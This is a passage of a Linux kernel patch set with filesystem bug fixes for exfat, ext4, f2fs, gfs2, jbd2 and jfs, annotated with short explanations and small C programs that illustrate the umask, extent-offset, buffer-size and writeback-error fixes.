++	if (info->size == 0) {
+ 		info->flags = ALLOC_NO_FAT_CHAIN;
+ 		info->start_clu = EXFAT_EOF_CLUSTER;
+ 	} else {
+@@ -888,6 +899,9 @@ static int exfat_check_dir_empty(struct super_block *sb,
+ 
+ 	dentries_per_clu = sbi->dentries_per_clu;
+ 
++	if (p_dir->dir == EXFAT_EOF_CLUSTER)
++		return 0;
++
+ 	exfat_chain_dup(&clu, p_dir);
+ 
+ 	while (clu.dir != EXFAT_EOF_CLUSTER) {
+@@ -1262,7 +1276,8 @@ static int __exfat_rename(struct inode *old_parent_inode,
+ 		}
+ 
+ 		/* Free the clusters if new_inode is a dir(as if exfat_rmdir) */
+-		if (new_entry_type == TYPE_DIR) {
++		if (new_entry_type == TYPE_DIR &&
++		    new_ei->start_clu != EXFAT_EOF_CLUSTER) {
+ 			/* new_ei, new_clu_to_free */
+ 			struct exfat_chain new_clu_to_free;
+ 
+diff --git a/fs/ext4/acl.h b/fs/ext4/acl.h
+index 3219669732bf4..0db6ae0ca9369 100644
+--- a/fs/ext4/acl.h
++++ b/fs/ext4/acl.h
+@@ -68,6 +68,11 @@ extern int ext4_init_acl(handle_t *, struct inode *, struct inode *);
+ static inline int
+ ext4_init_acl(handle_t *handle, struct inode *inode, struct inode *dir)
+ {
++	/* Usually the umask is applied by posix_acl_create(); if ext4 ACL
++	 * support is disabled at compile time, apply it here instead, as
++	 * posix_acl_create() will never be called. */
++	inode->i_mode &= ~current_umask();
++
+ 	return 0;
+ }
+ #endif  /* CONFIG_EXT4_FS_POSIX_ACL */
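
The stub above matters because with CONFIG_EXT4_FS_POSIX_ACL disabled, posix_acl_create() never runs, so nothing else strips the umask bits from a freshly created inode. The operation is a single bit-clear; with the common umask of 022, a requested mode of 0666 comes out as 0644:

#include <stdio.h>
#include <sys/types.h>

int main(void)
{
	mode_t requested = 0666;	/* rw-rw-rw- as passed to create */
	mode_t umask_val = 0022;	/* typical process umask */

	mode_t effective = requested & ~umask_val;	/* same op as the stub */
	printf("%04o\n", effective);			/* prints 0644 */
	return 0;
}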
+diff --git a/fs/ext4/extents_status.c b/fs/ext4/extents_status.c
+index 44e83521bfded..b57e497679ef9 100644
+--- a/fs/ext4/extents_status.c
++++ b/fs/ext4/extents_status.c
+@@ -1365,8 +1365,8 @@ retry:
+ 			}
+ 		}
+ 		if (count_reserved)
+-			count_rsvd(inode, lblk, orig_es.es_len - len1 - len2,
+-				   &orig_es, &rc);
++			count_rsvd(inode, orig_es.es_lblk + len1,
++				   orig_es.es_len - len1 - len2, &orig_es, &rc);
+ 		goto out_get_reserved;
+ 	}
+ 
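
The extents_status fix is index arithmetic: when an extent covering [es_lblk, es_lblk + es_len) is trimmed by len1 blocks at the front and len2 at the back, the surviving middle region starts at es_lblk + len1, not at the lblk the caller happened to pass in. Worked through with small numbers:

#include <assert.h>

int main(void)
{
	unsigned es_lblk = 100, es_len = 50;	/* extent covers [100, 150) */
	unsigned len1 = 10, len2 = 5;		/* trimmed from front and back */

	unsigned mid_start = es_lblk + len1;		/* 110, what the fix passes */
	unsigned mid_len = es_len - len1 - len2;	/* 35 blocks survive */

	assert(mid_start == 110 && mid_len == 35);
	assert(mid_start + mid_len == es_lblk + es_len - len2);	/* [110, 145) */
	return 0;
}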
+diff --git a/fs/ext4/file.c b/fs/ext4/file.c
+index a7a597c727e63..8ebe4dc7b0170 100644
+--- a/fs/ext4/file.c
++++ b/fs/ext4/file.c
+@@ -296,80 +296,38 @@ out:
+ }
+ 
+ static ssize_t ext4_handle_inode_extension(struct inode *inode, loff_t offset,
+-					   ssize_t written, size_t count)
++					   ssize_t count)
+ {
+ 	handle_t *handle;
+-	bool truncate = false;
+-	u8 blkbits = inode->i_blkbits;
+-	ext4_lblk_t written_blk, end_blk;
+-	int ret;
+-
+-	/*
+-	 * Note that EXT4_I(inode)->i_disksize can get extended up to
+-	 * inode->i_size while the I/O was running due to writeback of delalloc
+-	 * blocks. But, the code in ext4_iomap_alloc() is careful to use
+-	 * zeroed/unwritten extents if this is possible; thus we won't leave
+-	 * uninitialized blocks in a file even if we didn't succeed in writing
+-	 * as much as we intended.
+-	 */
+-	WARN_ON_ONCE(i_size_read(inode) < EXT4_I(inode)->i_disksize);
+-	if (offset + count <= EXT4_I(inode)->i_disksize) {
+-		/*
+-		 * We need to ensure that the inode is removed from the orphan
+-		 * list if it has been added prematurely, due to writeback of
+-		 * delalloc blocks.
+-		 */
+-		if (!list_empty(&EXT4_I(inode)->i_orphan) && inode->i_nlink) {
+-			handle = ext4_journal_start(inode, EXT4_HT_INODE, 2);
+-
+-			if (IS_ERR(handle)) {
+-				ext4_orphan_del(NULL, inode);
+-				return PTR_ERR(handle);
+-			}
+-
+-			ext4_orphan_del(handle, inode);
+-			ext4_journal_stop(handle);
+-		}
+-
+-		return written;
+-	}
+-
+-	if (written < 0)
+-		goto truncate;
+ 
++	lockdep_assert_held_write(&inode->i_rwsem);
+ 	handle = ext4_journal_start(inode, EXT4_HT_INODE, 2);
+-	if (IS_ERR(handle)) {
+-		written = PTR_ERR(handle);
+-		goto truncate;
+-	}
++	if (IS_ERR(handle))
++		return PTR_ERR(handle);
+ 
+-	if (ext4_update_inode_size(inode, offset + written)) {
+-		ret = ext4_mark_inode_dirty(handle, inode);
++	if (ext4_update_inode_size(inode, offset + count)) {
++		int ret = ext4_mark_inode_dirty(handle, inode);
+ 		if (unlikely(ret)) {
+-			written = ret;
+ 			ext4_journal_stop(handle);
+-			goto truncate;
++			return ret;
+ 		}
+ 	}
+ 
+-	/*
+-	 * We may need to truncate allocated but not written blocks beyond EOF.
+-	 */
+-	written_blk = ALIGN(offset + written, 1 << blkbits);
+-	end_blk = ALIGN(offset + count, 1 << blkbits);
+-	if (written_blk < end_blk && ext4_can_truncate(inode))
+-		truncate = true;
+-
+-	/*
+-	 * Remove the inode from the orphan list if it has been extended and
+-	 * everything went OK.
+-	 */
+-	if (!truncate && inode->i_nlink)
++	if (inode->i_nlink)
+ 		ext4_orphan_del(handle, inode);
+ 	ext4_journal_stop(handle);
+ 
+-	if (truncate) {
+-truncate:
++	return count;
++}
++
++/*
++ * Clean up the inode after DIO or DAX extending write has completed and the
++ * inode size has been updated using ext4_handle_inode_extension().
++ */
++static void ext4_inode_extension_cleanup(struct inode *inode, ssize_t count)
++{
++	lockdep_assert_held_write(&inode->i_rwsem);
++	if (count < 0) {
+ 		ext4_truncate_failed_write(inode);
+ 		/*
+ 		 * If the truncate operation failed early, then the inode may
+@@ -378,9 +336,28 @@ truncate:
+ 		 */
+ 		if (inode->i_nlink)
+ 			ext4_orphan_del(NULL, inode);
++		return;
+ 	}
++	/*
++	 * If i_disksize got extended due to writeback of delalloc blocks while
++	 * the DIO was running we could fail to cleanup the orphan list in
++	 * ext4_handle_inode_extension(). Do it now.
++	 */
++	if (!list_empty(&EXT4_I(inode)->i_orphan) && inode->i_nlink) {
++		handle_t *handle = ext4_journal_start(inode, EXT4_HT_INODE, 2);
+ 
+-	return written;
++		if (IS_ERR(handle)) {
++			/*
++			 * The write has successfully completed. Not much to
++			 * do with the error here so just cleanup the orphan
++			 * list and hope for the best.
++			 */
++			ext4_orphan_del(NULL, inode);
++			return;
++		}
++		ext4_orphan_del(handle, inode);
++		ext4_journal_stop(handle);
++	}
+ }
+ 
+ static int ext4_dio_write_end_io(struct kiocb *iocb, ssize_t size,
+@@ -389,31 +366,22 @@ static int ext4_dio_write_end_io(struct kiocb *iocb, ssize_t size,
+ 	loff_t pos = iocb->ki_pos;
+ 	struct inode *inode = file_inode(iocb->ki_filp);
+ 
++	if (!error && size && flags & IOMAP_DIO_UNWRITTEN)
++		error = ext4_convert_unwritten_extents(NULL, inode, pos, size);
+ 	if (error)
+ 		return error;
+-
+-	if (size && flags & IOMAP_DIO_UNWRITTEN) {
+-		error = ext4_convert_unwritten_extents(NULL, inode, pos, size);
+-		if (error < 0)
+-			return error;
+-	}
+ 	/*
+-	 * If we are extending the file, we have to update i_size here before
+-	 * page cache gets invalidated in iomap_dio_rw(). Otherwise racing
+-	 * buffered reads could zero out too much from page cache pages. Update
+-	 * of on-disk size will happen later in ext4_dio_write_iter() where
+-	 * we have enough information to also perform orphan list handling etc.
+-	 * Note that we perform all extending writes synchronously under
+-	 * i_rwsem held exclusively so i_size update is safe here in that case.
+-	 * If the write was not extending, we cannot see pos > i_size here
+-	 * because operations reducing i_size like truncate wait for all
+-	 * outstanding DIO before updating i_size.
++	 * Note that EXT4_I(inode)->i_disksize can get extended up to
++	 * inode->i_size while the I/O was running due to writeback of delalloc
++	 * blocks. But the code in ext4_iomap_alloc() is careful to use
++	 * zeroed/unwritten extents if this is possible; thus we won't leave
++	 * uninitialized blocks in a file even if we didn't succeed in writing
++	 * as much as we intended.
+ 	 */
+-	pos += size;
+-	if (pos > i_size_read(inode))
+-		i_size_write(inode, pos);
+-
+-	return 0;
++	WARN_ON_ONCE(i_size_read(inode) < READ_ONCE(EXT4_I(inode)->i_disksize));
++	if (pos + size <= READ_ONCE(EXT4_I(inode)->i_disksize))
++		return size;
++	return ext4_handle_inode_extension(inode, pos, size);
+ }
+ 
+ static const struct iomap_dio_ops ext4_dio_write_ops = {
+@@ -589,9 +557,16 @@ static ssize_t ext4_dio_write_iter(struct kiocb *iocb, struct iov_iter *from)
+ 			   NULL, 0);
+ 	if (ret == -ENOTBLK)
+ 		ret = 0;
+-
+-	if (extend)
+-		ret = ext4_handle_inode_extension(inode, offset, ret, count);
++	if (extend) {
++		/*
++		 * We always perform extending DIO write synchronously so by
++		 * now the IO is completed and ext4_handle_inode_extension()
++		 * was called. Cleanup the inode in case of error or race with
++		 * writeback of delalloc blocks.
++		 */
++		WARN_ON_ONCE(ret == -EIOCBQUEUED);
++		ext4_inode_extension_cleanup(inode, ret);
++	}
+ 
+ out:
+ 	if (ilock_shared)
+@@ -672,8 +647,10 @@ ext4_dax_write_iter(struct kiocb *iocb, struct iov_iter *from)
+ 
+ 	ret = dax_iomap_rw(iocb, from, &ext4_iomap_ops);
+ 
+-	if (extend)
+-		ret = ext4_handle_inode_extension(inode, offset, ret, count);
++	if (extend) {
++		ret = ext4_handle_inode_extension(inode, offset, ret);
++		ext4_inode_extension_cleanup(inode, ret);
++	}
+ out:
+ 	inode_unlock(inode);
+ 	if (ret > 0)
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index 5aa3003cfc688..2479508deab3b 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -824,10 +824,22 @@ int ext4_get_block(struct inode *inode, sector_t iblock,
+ int ext4_get_block_unwritten(struct inode *inode, sector_t iblock,
+ 			     struct buffer_head *bh_result, int create)
+ {
++	int ret = 0;
++
+ 	ext4_debug("ext4_get_block_unwritten: inode %lu, create flag %d\n",
+ 		   inode->i_ino, create);
+-	return _ext4_get_block(inode, iblock, bh_result,
++	ret = _ext4_get_block(inode, iblock, bh_result,
+ 			       EXT4_GET_BLOCKS_CREATE_UNWRIT_EXT);
++
++	/*
++	 * If the buffer is marked unwritten, mark it as new to make sure it is
++	 * zeroed out correctly in case of partial writes. Otherwise, there is
++	 * a chance of stale data getting exposed.
++	 */
++	if (ret == 0 && buffer_unwritten(bh_result))
++		set_buffer_new(bh_result);
++
++	return ret;
+ }
+ 
+ /* Maximum number of blocks we map for direct IO at once. */
+diff --git a/fs/ext4/resize.c b/fs/ext4/resize.c
+index b493233750ab2..9833ab6db117c 100644
+--- a/fs/ext4/resize.c
++++ b/fs/ext4/resize.c
+@@ -560,13 +560,8 @@ static int setup_new_flex_group_blocks(struct super_block *sb,
+ 		if (meta_bg == 0 && !ext4_bg_has_super(sb, group))
+ 			goto handle_itb;
+ 
+-		if (meta_bg == 1) {
+-			ext4_group_t first_group;
+-			first_group = ext4_meta_bg_first_group(sb, group);
+-			if (first_group != group + 1 &&
+-			    first_group != group + EXT4_DESC_PER_BLOCK(sb) - 1)
+-				goto handle_itb;
+-		}
++		if (meta_bg == 1)
++			goto handle_itb;
+ 
+ 		block = start + ext4_bg_has_super(sb, group);
+ 		/* Copy all of the GDT blocks into the backup in this group */
+@@ -1191,8 +1186,10 @@ static void update_backups(struct super_block *sb, sector_t blk_off, char *data,
+ 			   ext4_group_first_block_no(sb, group));
+ 		BUFFER_TRACE(bh, "get_write_access");
+ 		if ((err = ext4_journal_get_write_access(handle, sb, bh,
+-							 EXT4_JTR_NONE)))
++							 EXT4_JTR_NONE))) {
++			brelse(bh);
+ 			break;
++		}
+ 		lock_buffer(bh);
+ 		memcpy(bh->b_data, data, size);
+ 		if (rest)
+@@ -1602,6 +1599,8 @@ exit_journal:
+ 		int gdb_num_end = ((group + flex_gd->count - 1) /
+ 				   EXT4_DESC_PER_BLOCK(sb));
+ 		int meta_bg = ext4_has_feature_meta_bg(sb);
++		sector_t padding_blocks = meta_bg ? 0 : sbi->s_sbh->b_blocknr -
++					 ext4_group_first_block_no(sb, 0);
+ 		sector_t old_gdb = 0;
+ 
+ 		update_backups(sb, ext4_group_first_block_no(sb, 0),
+@@ -1613,8 +1612,8 @@ exit_journal:
+ 						     gdb_num);
+ 			if (old_gdb == gdb_bh->b_blocknr)
+ 				continue;
+-			update_backups(sb, gdb_bh->b_blocknr, gdb_bh->b_data,
+-				       gdb_bh->b_size, meta_bg);
++			update_backups(sb, gdb_bh->b_blocknr - padding_blocks,
++				       gdb_bh->b_data, gdb_bh->b_size, meta_bg);
+ 			old_gdb = gdb_bh->b_blocknr;
+ 		}
+ 	}
+@@ -1983,9 +1982,7 @@ static int ext4_convert_meta_bg(struct super_block *sb, struct inode *inode)
+ 
+ errout:
+ 	ret = ext4_journal_stop(handle);
+-	if (!err)
+-		err = ret;
+-	return ret;
++	return err ? err : ret;
+ 
+ invalid_resize_inode:
+ 	ext4_error(sb, "corrupted/inconsistent resize inode");
+diff --git a/fs/f2fs/compress.c b/fs/f2fs/compress.c
+index fb75ff7b3448d..11d9dce994dbe 100644
+--- a/fs/f2fs/compress.c
++++ b/fs/f2fs/compress.c
+@@ -1983,7 +1983,7 @@ void f2fs_destroy_compress_inode(struct f2fs_sb_info *sbi)
+ int f2fs_init_page_array_cache(struct f2fs_sb_info *sbi)
+ {
+ 	dev_t dev = sbi->sb->s_bdev->bd_dev;
+-	char slab_name[32];
++	char slab_name[35];
+ 
+ 	if (!f2fs_sb_has_compression(sbi))
+ 		return 0;
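
The f2fs change grows the slab-name buffer from 32 to 35 bytes. Assuming the name is built as "f2fs_page_array_entry-%u:%u" from the device's major and minor numbers, the worst case is 22 prefix characters + 4 digits (12-bit major, max 4095) + ':' + 7 digits (20-bit minor, max 1048575) + NUL = 35, which the old buffer could not hold. A quick check:

#include <stdio.h>

int main(void)
{
	char slab_name[35];
	unsigned major = 4095;		/* 12-bit maximum */
	unsigned minor = 1048575;	/* 20-bit maximum */

	int n = snprintf(slab_name, sizeof(slab_name),
			 "f2fs_page_array_entry-%u:%u", major, minor);
	printf("%d chars + NUL: %s\n", n, slab_name);	/* 34 chars, just fits */
	return n >= (int)sizeof(slab_name);	/* nonzero means truncation */
}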
+diff --git a/fs/f2fs/node.c b/fs/f2fs/node.c
+index a010b4bc36d2c..6efccd7ccfe1b 100644
+--- a/fs/f2fs/node.c
++++ b/fs/f2fs/node.c
+@@ -1455,7 +1455,8 @@ page_hit:
+ 			  ofs_of_node(page), cpver_of_node(page),
+ 			  next_blkaddr_of_node(page));
+ 	set_sbi_flag(sbi, SBI_NEED_FSCK);
+-	err = -EINVAL;
++	f2fs_handle_error(sbi, ERROR_INCONSISTENT_FOOTER);
++	err = -EFSCORRUPTED;
+ out_err:
+ 	ClearPageUptodate(page);
+ out_put_err:
+@@ -2737,7 +2738,9 @@ recover_xnid:
+ 	f2fs_update_inode_page(inode);
+ 
+ 	/* 3: update and set xattr node page dirty */
+-	memcpy(F2FS_NODE(xpage), F2FS_NODE(page), VALID_XATTR_BLOCK_SIZE);
++	if (page)
++		memcpy(F2FS_NODE(xpage), F2FS_NODE(page),
++				VALID_XATTR_BLOCK_SIZE);
+ 
+ 	set_page_dirty(xpage);
+ 	f2fs_put_page(xpage, 1);
+diff --git a/fs/f2fs/xattr.c b/fs/f2fs/xattr.c
+index db3b641f2158c..adaad16468d8a 100644
+--- a/fs/f2fs/xattr.c
++++ b/fs/f2fs/xattr.c
+@@ -363,10 +363,10 @@ static int lookup_all_xattrs(struct inode *inode, struct page *ipage,
+ 
+ 	*xe = __find_xattr(cur_addr, last_txattr_addr, NULL, index, len, name);
+ 	if (!*xe) {
+-		f2fs_err(F2FS_I_SB(inode), "inode (%lu) has corrupted xattr",
++		f2fs_err(F2FS_I_SB(inode), "lookup inode (%lu) has corrupted xattr",
+ 								inode->i_ino);
+ 		set_sbi_flag(F2FS_I_SB(inode), SBI_NEED_FSCK);
+-		err = -EFSCORRUPTED;
++		err = -ENODATA;
+ 		f2fs_handle_error(F2FS_I_SB(inode),
+ 					ERROR_CORRUPTED_XATTR);
+ 		goto out;
+@@ -583,13 +583,12 @@ ssize_t f2fs_listxattr(struct dentry *dentry, char *buffer, size_t buffer_size)
+ 
+ 		if ((void *)(entry) + sizeof(__u32) > last_base_addr ||
+ 			(void *)XATTR_NEXT_ENTRY(entry) > last_base_addr) {
+-			f2fs_err(F2FS_I_SB(inode), "inode (%lu) has corrupted xattr",
++			f2fs_err(F2FS_I_SB(inode), "list inode (%lu) has corrupted xattr",
+ 						inode->i_ino);
+ 			set_sbi_flag(F2FS_I_SB(inode), SBI_NEED_FSCK);
+-			error = -EFSCORRUPTED;
+ 			f2fs_handle_error(F2FS_I_SB(inode),
+ 						ERROR_CORRUPTED_XATTR);
+-			goto cleanup;
++			break;
+ 		}
+ 
+ 		if (!handler || (handler->list && !handler->list(dentry)))
+@@ -650,7 +649,7 @@ static int __f2fs_setxattr(struct inode *inode, int index,
+ 
+ 	if (size > MAX_VALUE_LEN(inode))
+ 		return -E2BIG;
+-
++retry:
+ 	error = read_all_xattrs(inode, ipage, &base_addr);
+ 	if (error)
+ 		return error;
+@@ -660,7 +659,14 @@ static int __f2fs_setxattr(struct inode *inode, int index,
+ 	/* find entry with wanted name. */
+ 	here = __find_xattr(base_addr, last_base_addr, NULL, index, len, name);
+ 	if (!here) {
+-		f2fs_err(F2FS_I_SB(inode), "inode (%lu) has corrupted xattr",
++		if (!F2FS_I(inode)->i_xattr_nid) {
++			f2fs_notice(F2FS_I_SB(inode),
++				"recover xattr in inode (%lu)", inode->i_ino);
++			f2fs_recover_xattr_data(inode, NULL);
++			kfree(base_addr);
++			goto retry;
++		}
++		f2fs_err(F2FS_I_SB(inode), "set inode (%lu) has corrupted xattr",
+ 								inode->i_ino);
+ 		set_sbi_flag(F2FS_I_SB(inode), SBI_NEED_FSCK);
+ 		error = -EFSCORRUPTED;
+diff --git a/fs/gfs2/inode.c b/fs/gfs2/inode.c
+index 04a201584fa7c..23e6962cdd6e3 100644
+--- a/fs/gfs2/inode.c
++++ b/fs/gfs2/inode.c
+@@ -1845,16 +1845,24 @@ out:
+ int gfs2_permission(struct user_namespace *mnt_userns, struct inode *inode,
+ 		    int mask)
+ {
++	int may_not_block = mask & MAY_NOT_BLOCK;
+ 	struct gfs2_inode *ip;
+ 	struct gfs2_holder i_gh;
++	struct gfs2_glock *gl;
+ 	int error;
+ 
+ 	gfs2_holder_mark_uninitialized(&i_gh);
+ 	ip = GFS2_I(inode);
+-	if (gfs2_glock_is_locked_by_me(ip->i_gl) == NULL) {
+-		if (mask & MAY_NOT_BLOCK)
++	gl = rcu_dereference_check(ip->i_gl, !may_not_block);
++	if (unlikely(!gl)) {
++		/* inode is getting torn down, must be RCU mode */
++		WARN_ON_ONCE(!may_not_block);
++		return -ECHILD;
++	}
++	if (gfs2_glock_is_locked_by_me(gl) == NULL) {
++		if (may_not_block)
+ 			return -ECHILD;
+-		error = gfs2_glock_nq_init(ip->i_gl, LM_ST_SHARED, LM_FLAG_ANY, &i_gh);
++		error = gfs2_glock_nq_init(gl, LM_ST_SHARED, LM_FLAG_ANY, &i_gh);
+ 		if (error)
+ 			return error;
+ 	}
+diff --git a/fs/gfs2/quota.c b/fs/gfs2/quota.c
+index 1ed17226d9ede..86bc73bd770b4 100644
+--- a/fs/gfs2/quota.c
++++ b/fs/gfs2/quota.c
+@@ -438,6 +438,17 @@ static int qd_check_sync(struct gfs2_sbd *sdp, struct gfs2_quota_data *qd,
+ 	    (sync_gen && (qd->qd_sync_gen >= *sync_gen)))
+ 		return 0;
+ 
++	/*
++	 * If qd_change is 0 it means a pending quota change was negated.
++	 * We should not sync it, but we still have a qd reference and slot
++	 * reference taken by gfs2_quota_change -> do_qc that need to be put.
++	 */
++	if (!qd->qd_change && test_and_clear_bit(QDF_CHANGE, &qd->qd_flags)) {
++		slot_put(qd);
++		qd_put(qd);
++		return 0;
++	}
++
+ 	if (!lockref_get_not_dead(&qd->qd_lockref))
+ 		return 0;
+ 
+diff --git a/fs/gfs2/super.c b/fs/gfs2/super.c
+index 44c564f0bc622..302d1e43d7012 100644
+--- a/fs/gfs2/super.c
++++ b/fs/gfs2/super.c
+@@ -1435,7 +1435,7 @@ out:
+ 		wait_on_bit_io(&ip->i_flags, GIF_GLOP_PENDING, TASK_UNINTERRUPTIBLE);
+ 		gfs2_glock_add_to_lru(ip->i_gl);
+ 		gfs2_glock_put_eventually(ip->i_gl);
+-		ip->i_gl = NULL;
++		rcu_assign_pointer(ip->i_gl, NULL);
+ 	}
+ }
+ 
+diff --git a/fs/inode.c b/fs/inode.c
+index 6ae760db13116..73ad1b0d47758 100644
+--- a/fs/inode.c
++++ b/fs/inode.c
+@@ -2501,6 +2501,22 @@ struct timespec64 current_time(struct inode *inode)
+ }
+ EXPORT_SYMBOL(current_time);
+ 
++/**
++ * inode_set_ctime_current - set the ctime to current_time
++ * @inode: inode
++ *
++ * Set the inode->i_ctime to the current value for the inode. Returns
++ * the current value that was assigned to i_ctime.
++ */
++struct timespec64 inode_set_ctime_current(struct inode *inode)
++{
++	struct timespec64 now = current_time(inode);
++
++	inode_set_ctime(inode, now.tv_sec, now.tv_nsec);
++	return now;
++}
++EXPORT_SYMBOL(inode_set_ctime_current);
++
+ /**
+  * in_group_or_capable - check whether caller is CAP_FSETID privileged
+  * @mnt_userns: user namespace of the mount @inode was found from
+diff --git a/fs/jbd2/recovery.c b/fs/jbd2/recovery.c
+index 357a3f7632e39..2426b89f1576f 100644
+--- a/fs/jbd2/recovery.c
++++ b/fs/jbd2/recovery.c
+@@ -288,6 +288,8 @@ int jbd2_journal_recover(journal_t *journal)
+ 	journal_superblock_t *	sb;
+ 
+ 	struct recovery_info	info;
++	errseq_t		wb_err;
++	struct address_space	*mapping;
+ 
+ 	memset(&info, 0, sizeof(info));
+ 	sb = journal->j_superblock;
+@@ -305,6 +307,9 @@ int jbd2_journal_recover(journal_t *journal)
+ 		return 0;
+ 	}
+ 
++	wb_err = 0;
++	mapping = journal->j_fs_dev->bd_inode->i_mapping;
++	errseq_check_and_advance(&mapping->wb_err, &wb_err);
+ 	err = do_one_pass(journal, &info, PASS_SCAN);
+ 	if (!err)
+ 		err = do_one_pass(journal, &info, PASS_REVOKE);
+@@ -323,6 +328,9 @@ int jbd2_journal_recover(journal_t *journal)
+ 
+ 	jbd2_journal_clear_revoke(journal);
+ 	err2 = sync_blockdev(journal->j_fs_dev);
++	if (!err)
++		err = err2;
++	err2 = errseq_check_and_advance(&mapping->wb_err, &wb_err);
+ 	if (!err)
+ 		err = err2;
+ 	/* Make sure all replayed data is on permanent storage */
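
The jbd2 hunk samples the journal device's writeback error cursor before replay and re-checks it afterwards, so an I/O error raised by writeback during recovery is reported instead of silently dropped. errseq_check_and_advance() is the kernel primitive; the snapshot, work, re-check pattern looks roughly like this simplified analogue (a real errseq_t also packs the error code and a seen flag into the counter):

#include <errno.h>
#include <stdio.h>

static unsigned long wb_err_seq;	/* bumped whenever writeback fails */

/* Report whether the error cursor moved since *since, then advance it. */
static int check_and_advance(unsigned long *since)
{
	int failed = (wb_err_seq != *since);

	*since = wb_err_seq;
	return failed ? -EIO : 0;
}

int main(void)
{
	unsigned long cursor = 0;

	check_and_advance(&cursor);		/* 1: sample before recovery */
	wb_err_seq++;				/* 2: a writeback error occurs */
	printf("recovery: %d\n", check_and_advance(&cursor)); /* 3: -EIO seen */
	return 0;
}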
+diff --git a/fs/jfs/jfs_dmap.c b/fs/jfs/jfs_dmap.c
+index e9d075cbd71ad..4d56f6081a5d2 100644
+--- a/fs/jfs/jfs_dmap.c
++++ b/fs/jfs/jfs_dmap.c
+@@ -87,7 +87,7 @@ static int dbAllocCtl(struct bmap * bmp, s64 nblocks, int l2nb, s64 blkno,
+ static int dbExtend(struct inode *ip, s64 blkno, s64 nblocks, s64 addnblocks);
+ static int dbFindBits(u32 word, int l2nb);
+ static int dbFindCtl(struct bmap * bmp, int l2nb, int level, s64 * blkno);
+-static int dbFindLeaf(dmtree_t * tp, int l2nb, int *leafidx);
++static int dbFindLeaf(dmtree_t *tp, int l2nb, int *leafidx, bool is_ctl);
+ static int dbFreeBits(struct bmap * bmp, struct dmap * dp, s64 blkno,
+ 		      int nblocks);
+ static int dbFreeDmap(struct bmap * bmp, struct dmap * dp, s64 blkno,
+@@ -180,7 +180,8 @@ int dbMount(struct inode *ipbmap)
+ 	bmp->db_nfree = le64_to_cpu(dbmp_le->dn_nfree);
+ 
+ 	bmp->db_l2nbperpage = le32_to_cpu(dbmp_le->dn_l2nbperpage);
+-	if (bmp->db_l2nbperpage > L2PSIZE - L2MINBLOCKSIZE) {
++	if (bmp->db_l2nbperpage > L2PSIZE - L2MINBLOCKSIZE ||
++		bmp->db_l2nbperpage < 0) {
+ 		err = -EINVAL;
+ 		goto err_release_metapage;
+ 	}
+@@ -194,6 +195,12 @@ int dbMount(struct inode *ipbmap)
+ 	bmp->db_maxlevel = le32_to_cpu(dbmp_le->dn_maxlevel);
+ 	bmp->db_maxag = le32_to_cpu(dbmp_le->dn_maxag);
+ 	bmp->db_agpref = le32_to_cpu(dbmp_le->dn_agpref);
++	if (bmp->db_maxag >= MAXAG || bmp->db_maxag < 0 ||
++		bmp->db_agpref >= MAXAG || bmp->db_agpref < 0) {
++		err = -EINVAL;
++		goto err_release_metapage;
++	}
++
+ 	bmp->db_aglevel = le32_to_cpu(dbmp_le->dn_aglevel);
+ 	bmp->db_agheight = le32_to_cpu(dbmp_le->dn_agheight);
+ 	bmp->db_agwidth = le32_to_cpu(dbmp_le->dn_agwidth);
+@@ -1710,7 +1717,7 @@ static int dbFindCtl(struct bmap * bmp, int l2nb, int level, s64 * blkno)
+ 		 * dbFindLeaf() returns the index of the leaf at which
+ 		 * free space was found.
+ 		 */
+-		rc = dbFindLeaf((dmtree_t *) dcp, l2nb, &leafidx);
++		rc = dbFindLeaf((dmtree_t *) dcp, l2nb, &leafidx, true);
+ 
+ 		/* release the buffer.
+ 		 */
+@@ -1957,7 +1964,7 @@ dbAllocDmapLev(struct bmap * bmp,
+ 	 * free space.  if sufficient free space is found, dbFindLeaf()
+ 	 * returns the index of the leaf at which free space was found.
+ 	 */
+-	if (dbFindLeaf((dmtree_t *) & dp->tree, l2nb, &leafidx))
++	if (dbFindLeaf((dmtree_t *) &dp->tree, l2nb, &leafidx, false))
+ 		return -ENOSPC;
+ 
+ 	if (leafidx < 0)
+@@ -2921,14 +2928,18 @@ static void dbAdjTree(dmtree_t * tp, int leafno, int newval)
+  *	leafidx	- return pointer to be set to the index of the leaf
+  *		  describing at least l2nb free blocks if sufficient
+  *		  free blocks are found.
++ *	is_ctl	- determines if the tree is of type ctl
+  *
+  * RETURN VALUES:
+  *	0	- success
+  *	-ENOSPC	- insufficient free blocks.
+  */
+-static int dbFindLeaf(dmtree_t * tp, int l2nb, int *leafidx)
++static int dbFindLeaf(dmtree_t *tp, int l2nb, int *leafidx, bool is_ctl)
+ {
+ 	int ti, n = 0, k, x = 0;
++	int max_size;
++
++	max_size = is_ctl ? CTLTREESIZE : TREESIZE;
+ 
+ 	/* first check the root of the tree to see if there is
+ 	 * sufficient free space.
+@@ -2949,6 +2960,8 @@ static int dbFindLeaf(dmtree_t * tp, int l2nb, int *leafidx)
+ 			/* sufficient free space found.  move to the next
+ 			 * level (or quit if this is the last level).
+ 			 */
++			if (x + n > max_size)
++				return -ENOSPC;
+ 			if (l2nb <= tp->dmt_stree[x + n])
+ 				break;
+ 		}
+diff --git a/fs/jfs/jfs_imap.c b/fs/jfs/jfs_imap.c
+index 4899663996d81..6ed2e1d4c894f 100644
+--- a/fs/jfs/jfs_imap.c
++++ b/fs/jfs/jfs_imap.c
+@@ -1320,7 +1320,7 @@ diInitInode(struct inode *ip, int iagno, int ino, int extno, struct iag * iagp)
+ int diAlloc(struct inode *pip, bool dir, struct inode *ip)
+ {
+ 	int rc, ino, iagno, addext, extno, bitno, sword;
+-	int nwords, rem, i, agno;
++	int nwords, rem, i, agno, dn_numag;
+ 	u32 mask, inosmap, extsmap;
+ 	struct inode *ipimap;
+ 	struct metapage *mp;
+@@ -1356,6 +1356,9 @@ int diAlloc(struct inode *pip, bool dir, struct inode *ip)
+ 
+ 	/* get the ag number of this iag */
+ 	agno = BLKTOAG(JFS_IP(pip)->agstart, JFS_SBI(pip->i_sb));
++	dn_numag = JFS_SBI(pip->i_sb)->bmap->db_numag;
++	if (agno < 0 || agno > dn_numag)
++		return -EIO;
+ 
+ 	if (atomic_read(&JFS_SBI(pip->i_sb)->bmap->db_active[agno])) {
+ 		/*
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index 5cf53def987e5..85a952143e9fb 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
